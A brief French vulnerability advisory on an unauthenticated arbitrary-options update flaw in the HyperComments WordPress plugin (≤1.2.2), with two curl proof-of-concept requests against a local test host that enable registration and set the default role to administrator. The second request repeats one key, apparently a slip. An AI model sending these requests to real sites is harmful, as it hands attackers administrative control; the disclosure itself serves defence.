
HyperComments <= 1.2.2 - Non authentifié (Abonné+) Mise à jour arbitraire des options
HyperComments <= 1.2.2 - Mise à jour non authentifiée (Abonné+) d'options arbitraires
Le plugin HyperComments pour WordPress est vulnérable à une modification non autorisée de données pouvant entraîner une escalade de privilèges en raison d'un manque de vérification des capacités sur la fonction hc_request_handler dans toutes les versions jusqu'à la version 1.2.2 incluse. Cela permet à des attaquants non authentifiés de mettre à jour des options arbitraires sur le site WordPress. Cela peut être exploité pour modifier le rôle par défaut pour l'inscription en administrateur et activer l'inscription des utilisateurs afin que les attaquants puissent obtenir un accès administratif à un site vulnérable.
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"default_role\":\"administrator\"}" \
-H "Content-Type: application/x-www-form-urlencoded"
curl -X POST "http://kubernetes.docker.internal:8999/?hc_action=update_options" \
-d "data={\"users_can_register\":\"1\",\"users_can_register\":\"1\"}" \
-H "Content-Type: application/x-www-form-urlencoded"